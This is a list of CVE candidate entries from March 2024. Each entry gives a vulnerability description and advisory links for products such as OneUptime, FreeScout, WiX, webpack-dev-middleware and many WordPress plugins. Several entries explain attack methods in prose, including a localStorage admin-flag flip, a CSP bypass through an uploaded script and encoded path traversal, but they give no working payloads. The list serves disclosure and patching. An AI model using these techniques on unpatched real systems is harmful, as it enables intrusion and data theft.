CVE 2024 29194 Candidate OneUptime is a solution for monitoring and managing online services. The vulnerability lies in the improper validation of client-side stored data within the web application. Specifically, the is_master_admin key, stored in the local storage of the browser, can be manipulated by an attacker. By changing this key from false to true, the application grants administrative privileges to the user, without proper server-side validation. This has been patched in 7.0.1815. MISC:https://github.com/OneUptime/oneuptime/commit/14016d23d834038dd65d3a96cf71af04b556a32c | URL:https://github.com/OneUptime/oneuptime/commit/14016d23d834038dd65d3a96cf71af04b556a32c | MISC:https://github.com/OneUptime/oneuptime/security/advisories/GHSA-246p-xmg8-wmcq | URL:https://github.com/OneUptime/oneuptime/security/advisories/GHSA-246p-xmg8-wmcq Assigned (20240318)
CVE 2024 29190 Candidate Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. In version 3.9.5 Beta and prior, MobSF does not perform any input validation when extracting the hostnames in `android:host`, so requests can also be sent to local hostnames. This can lead to server-side request forgery. An attacker can cause the server to make a connection to internal-only services within the organization's infrastructure. Commit 5a8eeee73c5f504a6c3abdf2a139a13804efdb77 has a hotfix for this issue. MISC:https://drive.google.com/file/d/1nbKMd2sKosbJef5Mh4DxjcHcQ8Hw0BNR/view?usp=share_link | URL:https://drive.google.com/file/d/1nbKMd2sKosbJef5Mh4DxjcHcQ8Hw0BNR/view?usp=share_link | MISC:https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/5a8eeee73c5f504a6c3abdf2a139a13804efdb77 | URL:https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/5a8eeee73c5f504a6c3abdf2a139a13804efdb77 | MISC:https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-wfgj-wrgh-h3r3 | URL:https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-wfgj-wrgh-h3r3 Assigned (20240318)
CVE 2024 29189 Candidate PyAnsys Geometry is a Python client library for the Ansys Geometry service and other CAD Ansys products. On file src/ansys/geometry/core/connection/product_instance.py, upon calling this method _start_program directly, users could exploit its usage to perform malicious operations on the current machine where the script is ran. This vulnerability is fixed in 0.3.3 and 0.4.12. MISC:https://bandit.readthedocs.io/en/1.7.8/plugins/b602_subprocess_popen_with_shell_equals_true.html | URL:https://bandit.readthedocs.io/en/1.7.8/plugins/b602_subprocess_popen_with_shell_equals_true.html | MISC:https://github.com/ansys/pyansys-geometry/blob/52cba1737a8a7812e5430099f715fa2160ec007b/src/ansys/geometry/core/connection/product_instance.py#L403-L428 | URL:https://github.com/ansys/pyansys-geometry/blob/52cba1737a8a7812e5430099f715fa2160ec007b/src/ansys/geometry/core/connection/product_instance.py#L403-L428 | MISC:https://github.com/ansys/pyansys-geometry/commit/902071701c4f3a8258cbaa46c28dc0a65442d1bc | URL:https://github.com/ansys/pyansys-geometry/commit/902071701c4f3a8258cbaa46c28dc0a65442d1bc | MISC:https://github.com/ansys/pyansys-geometry/commit/f82346b9432b06532e84f3278125f5879b4e9f3f | URL:https://github.com/ansys/pyansys-geometry/commit/f82346b9432b06532e84f3278125f5879b4e9f3f | MISC:https://github.com/ansys/pyansys-geometry/pull/1076 | URL:https://github.com/ansys/pyansys-geometry/pull/1076 | MISC:https://github.com/ansys/pyansys-geometry/pull/1077 | URL:https://github.com/ansys/pyansys-geometry/pull/1077 | MISC:https://github.com/ansys/pyansys-geometry/security/advisories/GHSA-38jr-29fh-w9vm | URL:https://github.com/ansys/pyansys-geometry/security/advisories/GHSA-38jr-29fh-w9vm Assigned (20240318)
CVE 2024 29188 Candidate WiX toolset lets developers create installers for Windows Installer, the Windows installation engine. The custom action behind WiX's `RemoveFolderEx` functionality could allow a standard user to delete protected directories. `RemoveFolderEx` deletes an entire directory tree during installation or uninstallation. It does so by recursing every subdirectory starting at a specified directory and adding each subdirectory to the list of directories Windows Installer should delete. If the setup author instructed `RemoveFolderEx` to delete a per-user folder from a per-machine installer, an attacker could create a directory junction in that per-user folder pointing to a per-machine, protected directory. Windows Installer, when executing the per-machine installer after approval by an administrator, would delete the target of the directory junction. This vulnerability is fixed in 3.14.1 and 4.0.5. MISC:https://github.com/wixtoolset/issues/security/advisories/GHSA-jx4p-m4wm-vvjg | URL:https://github.com/wixtoolset/issues/security/advisories/GHSA-jx4p-m4wm-vvjg | MISC:https://github.com/wixtoolset/wix/commit/2e5960b575881567a8807e6b8b9c513138b19742 | URL:https://github.com/wixtoolset/wix/commit/2e5960b575881567a8807e6b8b9c513138b19742 | MISC:https://github.com/wixtoolset/wix3/commit/93eeb5f6835776694021f66d4226c262c67d487a | URL:https://github.com/wixtoolset/wix3/commit/93eeb5f6835776694021f66d4226c262c67d487a Assigned (20240318)
CVE 2024 29187 Candidate WiX toolset lets developers create installers for Windows Installer, the Windows installation engine. When a bundle runs as SYSTEM user, Burn uses GetTempPathW which points to an insecure directory C:\Windows\Temp to drop and load multiple binaries. Standard users can hijack the binary before it's loaded in the application resulting in elevation of privileges. This vulnerability is fixed in 3.14.1 and 4.0.5. MISC:https://github.com/wixtoolset/issues/security/advisories/GHSA-rf39-3f98-xr7r | URL:https://github.com/wixtoolset/issues/security/advisories/GHSA-rf39-3f98-xr7r | MISC:https://github.com/wixtoolset/wix/commit/75a8c75d4e02ea219008dc5af7d03869291d61f7 | URL:https://github.com/wixtoolset/wix/commit/75a8c75d4e02ea219008dc5af7d03869291d61f7 | MISC:https://github.com/wixtoolset/wix3/commit/6d372e5169f1a334a395cdf496443bc0732098e9 | URL:https://github.com/wixtoolset/wix3/commit/6d372e5169f1a334a395cdf496443bc0732098e9 Assigned (20240318)
CVE 2024 29186 Candidate Bref is an open-source project that helps users go serverless on Amazon Web Services with PHP. When Bref prior to version 2.1.17 is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object. During the conversion process, if the request is a MultiPart, each part is parsed. In the parsing process, the `Content-Type` header of each part is read using the `Riverline/multipart-parser` library. The library, in the `StreamedPart::parseHeaderContent` function, performs slow multi-byte string operations on the header value. Precisely, the `mb_convert_encoding` function is used with the first (`$string`) and third (`$from_encoding`) parameters read from the header value. An attacker could send specifically crafted requests which would force the server into performing long operations with a consequent long billed duration. The attack has the following requirements and limitations: The Lambda should use the Event-Driven Function runtime and the `RequestHandlerInterface` handler and should implement at least an endpoint accepting POST requests; the attacker can send requests up to 6MB long (this is enough to cause a billed duration between 400ms and 500ms with the default 1024MB RAM Lambda image of Bref); and if the Lambda uses a PHP runtime <= php-82, the impact is higher as the billed duration in the default 1024MB RAM Lambda image of Bref could be brought to more than 900ms for each request. Notice that the vulnerability applies only to headers read from the request body as the request header has a limitation which allows a total maximum size of ~10KB. Version 2.1.17 contains a fix for this issue. MISC:https://github.com/brefphp/bref/commit/5f7c0294628dbcec6305f638ff7e2dba8a1c2f45 | URL:https://github.com/brefphp/bref/commit/5f7c0294628dbcec6305f638ff7e2dba8a1c2f45 | MISC:https://github.com/brefphp/bref/security/advisories/GHSA-j4hq-f63x-f39r | URL:https://github.com/brefphp/bref/security/advisories/GHSA-j4hq-f63x-f39r Assigned (20240318)
CVE 2024 29185 Candidate FreeScout is a self-hosted help desk and shared mailbox. Versions prior to 1.8.128 are vulnerable to OS Command Injection in the /public/tools.php source file. The value of the php_path parameter is being executed as an OS command by the shell_exec function, without validating it. This allows an adversary to execute malicious OS commands on the server. A practical demonstration of the successful command injection attack extracted the /etc/passwd file of the server. This represented the complete compromise of the server hosting the FreeScout application. This attack requires an attacker to know the `App_Key` of the application. This limitation makes the Attack Complexity to be High. If an attacker gets hold of the `App_Key`, the attacker can compromise the Complete server on which the application is deployed. Version 1.8.128 contains a patch for this issue. MISC:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-7p9x-ch4c-vqj9 | URL:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-7p9x-ch4c-vqj9 Assigned (20240318)
CVE 2024 29184 Candidate FreeScout is a self-hosted help desk and shared mailbox. A Stored Cross-Site Scripting (XSS) vulnerability has been identified within the Signature Input Field of the FreeScout Application prior to version 1.8.128. Stored XSS occurs when user input is not properly sanitized and is stored on the server, allowing an attacker to inject malicious scripts that will be executed when other users access the affected page. In this case, the Support Agent User can inject malicious scripts into their signature, which will then be executed when viewed by the Administrator. The application protects users against XSS attacks by enforcing a CSP policy, the CSP Policy is: `script-src 'self' 'nonce-abcd' `. The CSP policy only allows the inclusion of JS files that are present on the application server and doesn't allow any inline script or script other than nonce-abcd. The CSP policy was bypassed by uploading a JS file to the server by a POST request to /conversation/upload endpoint. After this, a working XSS payload was crafted by including the uploaded JS file link as the src of the script. This bypassed the CSP policy and XSS attacks became possible. The impact of this vulnerability is severe as it allows an attacker to compromise the FreeScout Application. By exploiting this vulnerability, the attacker can perform various malicious actions such as forcing the Administrator to execute actions without their knowledge or consent. For instance, the attacker can force the Administrator to add a new administrator controlled by the attacker, thereby giving the attacker full control over the application. Alternatively, the attacker can elevate the privileges of a low-privileged user to Administrator, further compromising the security of the application. Attackers can steal sensitive information such as login credentials, session tokens, personal identifiable information (PII), and financial data. The vulnerability can also lead to defacement of the Application. Version 1.8.128 contains a patch for this issue. MISC:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-fffc-phh8-5h4v | URL:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-fffc-phh8-5h4v Assigned (20240318)
CVE 2024 29180 Candidate Prior to versions 7.1.0, 6.1.2, and 5.3.4, the webpack-dev-middleware development middleware for devpack does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer's machine. The middleware can either work with the physical filesystem when reading the files or it can use a virtualized in-memory `memfs` filesystem. If `writeToDisk` configuration option is set to `true`, the physical filesystem is used. The `getFilenameFromUrl` method is used to parse URL and build the local file path. The public path prefix is stripped from the URL, and the `unsecaped` path suffix is appended to the `outputPath`. As the URL is not unescaped and normalized automatically before calling the midlleware, it is possible to use `%2e` and `%2f` sequences to perform path traversal attack. Developers using `webpack-dev-server` or `webpack-dev-middleware` are affected by the issue. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content. If the development server is listening on a public IP address (or `0.0.0.0`), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port). If the server allows access from third-party domains, an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files. Starting with fixed versions 7.1.0, 6.1.2, and 5.3.4, the URL is unescaped and normalized before any further processing. MISC:https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82 | URL:https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82 | MISC:https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21 | URL:https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21 | MISC:https://github.com/webpack/webpack-dev-middleware/commit/189c4ac7d2344ec132a4689e74dc837ec5be0132 | URL:https://github.com/webpack/webpack-dev-middleware/commit/189c4ac7d2344ec132a4689e74dc837ec5be0132 | MISC:https://github.com/webpack/webpack-dev-middleware/commit/9670b3495da518fe667ff3428c5e4cb9f2f3d353 | URL:https://github.com/webpack/webpack-dev-middleware/commit/9670b3495da518fe667ff3428c5e4cb9f2f3d353 | MISC:https://github.com/webpack/webpack-dev-middleware/commit/e10008c762e4d5821ed6990348dabf0d4d93a10e | URL:https://github.com/webpack/webpack-dev-middleware/commit/e10008c762e4d5821ed6990348dabf0d4d93a10e | MISC:https://github.com/webpack/webpack-dev-middleware/releases/tag/v5.3.4 | URL:https://github.com/webpack/webpack-dev-middleware/releases/tag/v5.3.4 | MISC:https://github.com/webpack/webpack-dev-middleware/releases/tag/v6.1.2 | URL:https://github.com/webpack/webpack-dev-middleware/releases/tag/v6.1.2 | MISC:https://github.com/webpack/webpack-dev-middleware/releases/tag/v7.1.0 | URL:https://github.com/webpack/webpack-dev-middleware/releases/tag/v7.1.0 | MISC:https://github.com/webpack/webpack-dev-middleware/security/advisories/GHSA-wr3j-pwj9-hqq6 | URL:https://github.com/webpack/webpack-dev-middleware/security/advisories/GHSA-wr3j-pwj9-hqq6 Assigned (20240318)
CVE 2024 29179 Candidate phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. An attacker with admin privileges can upload an attachment containing JS code without extension and the application will render it as HTML which allows for XSS attacks. MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-hm8r-95g3-5hj9 | URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-hm8r-95g3-5hj9 Assigned (20240318)
CVE 2024 29156 Candidate In OpenStack Murano through 16.0.0, when YAQL before 3.0.0 is used, the Murano service's MuranoPL extension to the YAQL language fails to sanitize the supplied environment, leading to potential leakage of sensitive service account information. MISC:https://launchpad.net/bugs/2048114 | MISC:https://opendev.org/openstack/murano/tags | MISC:https://opendev.org/openstack/yaql/commit/83e28324e1a0ce3970dd854393d2431123a909d3 | MISC:https://wiki.openstack.org/wiki/OSSN/OSSN-0093 Assigned (20240318)
CVE 2024 29154 Candidate danielmiessler fabric through 1.3.0 allows installer/client/gui/static/js/index.js XSS because of innerHTML mishandling, such as in htmlToPlainText. MISC:https://sec1.io/security-advisories/cross-site-scripting-xss/ Assigned (20240318)
CVE 2024 29151 Candidate Rocket.Chat.Audit through 5ad78e8 depends on filecachetools, which does not exist in PyPI. MISC:https://github.com/RocketChat/Rocket.Chat.Audit/blob/5ad78e8017a9e190602e8257c22500ded0d931a9/requirements.txt#L3 Assigned (20240318)
CVE 2024 29143 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cozmoslabs, sareiodata Passwordless Login passwordless-login allows Stored XSS.This issue affects Passwordless Login: from n/a through 1.1.2. MISC:https://patchstack.com/database/vulnerability/passwordless-login/wordpress-passwordless-login-plugin-1-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/passwordless-login/wordpress-passwordless-login-plugin-1-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 29142 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebberZone Better Search – Relevant search results for WordPress allows Stored XSS.This issue affects Better Search – Relevant search results for WordPress: from n/a through 3.3.0. MISC:https://patchstack.com/database/vulnerability/better-search/wordpress-better-search-plugin-3-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/better-search/wordpress-better-search-plugin-3-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 29141 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PDF Embedder allows Stored XSS.This issue affects PDF Embedder: from n/a through 4.6.4. MISC:https://patchstack.com/database/vulnerability/pdf-embedder/wordpress-pdf-embedder-plugin-4-6-4-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/pdf-embedder/wordpress-pdf-embedder-plugin-4-6-4-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 29140 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Matt Manning MJM Clinic allows Stored XSS.This issue affects MJM Clinic: from n/a through 1.1.22. MISC:https://patchstack.com/database/vulnerability/mjm-clinic/wordpress-mjm-clinic-plugin-1-1-22-cross-site-scripting-xss-vulnerability-2?_s_id=cve | URL:https://patchstack.com/database/vulnerability/mjm-clinic/wordpress-mjm-clinic-plugin-1-1-22-cross-site-scripting-xss-vulnerability-2?_s_id=cve Assigned (20240317)
CVE 2024 29139 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mark Tilly MyCurator Content Curation allows Reflected XSS.This issue affects MyCurator Content Curation: from n/a through 3.76. MISC:https://patchstack.com/database/vulnerability/mycurator/wordpress-mycurator-content-curation-plugin-3-76-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/mycurator/wordpress-mycurator-content-curation-plugin-3-76-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 29138 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DEV Institute Restrict User Access – Membership Plugin with Force allows Reflected XSS.This issue affects Restrict User Access – Membership Plugin with Force: from n/a through 2.5. MISC:https://patchstack.com/database/vulnerability/restrict-user-access/wordpress-restrict-user-access-plugin-2-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/restrict-user-access/wordpress-restrict-user-access-plugin-2-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 29137 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themefic Tourfic allows Reflected XSS.This issue affects Tourfic: from n/a through 2.11.7. MISC:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 29136 Candidate Deserialization of Untrusted Data vulnerability in Themefic Tourfic.This issue affects Tourfic: from n/a through 2.11.17. MISC:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-17-php-object-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-17-php-object-injection-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 29135 Candidate Unrestricted Upload of File with Dangerous Type vulnerability in Tourfic.This issue affects Tourfic: from n/a through 2.11.15. MISC:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-15-arbitrary-file-upload-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-15-arbitrary-file-upload-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 29134 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themefic Tourfic allows Stored XSS.This issue affects Tourfic: from n/a through 2.11.8. MISC:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-8-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-8-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 29133 Candidate Out-of-bounds Write vulnerability in Apache Commons Configuration.This issue affects Apache Commons Configuration: from 2.0 before 2.10.1. Users are recommended to upgrade to version 2.10.1, which fixes the issue. MISC:https://lists.apache.org/thread/ccb9w15bscznh6tnp3wsvrrj9crbszh2 | URL:https://lists.apache.org/thread/ccb9w15bscznh6tnp3wsvrrj9crbszh2 Assigned (20240317)
CVE 2024 29130 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Paterson Contact Form 7 – PayPal & Stripe Add-on allows Reflected XSS.This issue affects Contact Form 7 – PayPal & Stripe Add-on: from n/a through 2.0. MISC:https://patchstack.com/database/vulnerability/contact-form-7-paypal-add-on/wordpress-contact-form-7-paypal-stripe-add-on-plugin-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/contact-form-7-paypal-add-on/wordpress-contact-form-7-paypal-stripe-add-on-plugin-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240316)
CVE 2024 29129 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPLIT Pty Ltd OxyExtras allows Reflected XSS.This issue affects OxyExtras: from n/a through 1.4.4. MISC:https://patchstack.com/database/vulnerability/oxyextras/wordpress-oxyextras-plugin-1-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/oxyextras/wordpress-oxyextras-plugin-1-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240316)
CVE 2024 29128 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Post SMTP POST SMTP allows Reflected XSS.This issue affects POST SMTP: from n/a through 2.8.6. MISC:https://patchstack.com/database/vulnerability/post-smtp/wordpress-post-smtp-mailer-plugin-2-8-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/post-smtp/wordpress-post-smtp-mailer-plugin-2-8-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240316)
CVE 2024 29127 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AAM Advanced Access Manager allows Reflected XSS.This issue affects Advanced Access Manager: from n/a through 6.9.20. MISC:https://patchstack.com/database/vulnerability/advanced-access-manager/wordpress-advanced-access-manager-plugin-6-9-20-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/advanced-access-manager/wordpress-advanced-access-manager-plugin-6-9-20-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240316)
CVE 2024 29126 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jose Mortellaro Specific Content For Mobile – Customize the mobile version without redirections allows Reflected XSS.This issue affects Specific Content For Mobile – Customize the mobile version without redirections: from n/a through 0.1.9.5. MISC:https://patchstack.com/database/vulnerability/specific-content-for-mobile/wordpress-specific-content-for-mobile-plugin-0-1-9-5-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/specific-content-for-mobile/wordpress-specific-content-for-mobile-plugin-0-1-9-5-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240316)
CVE 2024 29125 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Elliot Sowersby, RelyWP Coupon Affiliates allows Reflected XSS.This issue affects Coupon Affiliates: from n/a through 5.12.7. MISC:https://patchstack.com/database/vulnerability/woo-coupon-usage/wordpress-coupon-affiliates-plugin-5-12-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/woo-coupon-usage/wordpress-coupon-affiliates-plugin-5-12-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240316)
CVE 2024 29124 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AAM Advanced Access Manager allows Stored XSS.This issue affects Advanced Access Manager: from n/a through 6.9.20. MISC:https://patchstack.com/database/vulnerability/advanced-access-manager/wordpress-advanced-access-manager-plugin-6-9-20-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/advanced-access-manager/wordpress-advanced-access-manager-plugin-6-9-20-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240316)
CVE 2024 29123 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yannick Lefebvre Link Library allows Reflected XSS.This issue affects Link Library: from n/a through 7.6. MISC:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240316)
CVE 2024 29122 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Foliovision: Making the web work for you FV Flowplayer Video Player allows Stored XSS.This issue affects FV Flowplayer Video Player: from n/a through 7.5.41.7212. MISC:https://patchstack.com/database/vulnerability/fv-wordpress-flowplayer/wordpress-fv-player-plugin-7-5-41-7212-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/fv-wordpress-flowplayer/wordpress-fv-player-plugin-7-5-41-7212-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240316)
CVE 2024 29121 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Firassaidi WooCommerce License Manager allows Reflected XSS.This issue affects WooCommerce License Manager: from n/a through 5.3.1. MISC:https://patchstack.com/database/vulnerability/fs-license-manager/wordpress-woocommerce-license-manager-plugin-5-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/fs-license-manager/wordpress-woocommerce-license-manager-plugin-5-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240316)
CVE 2024 29118 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scrollsequence allows Stored XSS.This issue affects Scrollsequence: from n/a through 1.5.4. MISC:https://patchstack.com/database/vulnerability/scrollsequence/wordpress-scrollsequence-plugin-1-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/scrollsequence/wordpress-scrollsequence-plugin-1-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29117 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cimatti Consulting Contact Forms by Cimatti allows Stored XSS.This issue affects Contact Forms by Cimatti: from n/a through 1.7.0. MISC:https://patchstack.com/database/vulnerability/contact-forms/wordpress-contact-forms-by-cimatti-plugin-1-7-0-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/contact-forms/wordpress-contact-forms-by-cimatti-plugin-1-7-0-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29116 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in IconicWP WooThumbs for WooCommerce by Iconic allows Reflected XSS.This issue affects WooThumbs for WooCommerce by Iconic: from n/a through 5.5.3. MISC:https://patchstack.com/database/vulnerability/iconic-woothumbs/wordpress-woothumbs-for-woocommerce-by-iconic-plugin-5-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/iconic-woothumbs/wordpress-woothumbs-for-woocommerce-by-iconic-plugin-5-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29115 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zaytech Smart Online Order for Clover allows Stored XSS.This issue affects Smart Online Order for Clover: from n/a through 1.5.5. MISC:https://patchstack.com/database/vulnerability/clover-online-orders/wordpress-smart-online-order-for-clover-plugin-1-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/clover-online-orders/wordpress-smart-online-order-for-clover-plugin-1-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29114 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in W3 Eden, Inc. Download Manager allows Stored XSS.This issue affects Download Manager: from n/a through 3.2.84. MISC:https://patchstack.com/database/vulnerability/download-manager/wordpress-download-manager-plugin-3-2-84-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/download-manager/wordpress-download-manager-plugin-3-2-84-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29113 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Metagauss RegistrationMagic allows Reflected XSS.This issue affects RegistrationMagic: from n/a through 5.2.5.9. MISC:https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-5-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-5-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29112 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Marketing Robot WooCommerce Google Feed Manager allows Stored XSS.This issue affects WooCommerce Google Feed Manager: from n/a through 2.2.0. MISC:https://patchstack.com/database/vulnerability/wp-product-feed-manager/wordpress-woocommerce-google-feed-manager-plugin-2-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-product-feed-manager/wordpress-woocommerce-google-feed-manager-plugin-2-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29111 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Webvitaly Sitekit allows Stored XSS.This issue affects Sitekit: from n/a through 1.6. MISC:https://patchstack.com/database/vulnerability/sitekit/wordpress-sitekit-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/sitekit/wordpress-sitekit-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29110 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pauple Table & Contact Form 7 Database – Tablesome allows Reflected XSS.This issue affects Table & Contact Form 7 Database – Tablesome: from n/a through 1.0.27. MISC:https://patchstack.com/database/vulnerability/tablesome/wordpress-tablesome-plugin-1-0-27-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/tablesome/wordpress-tablesome-plugin-1-0-27-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
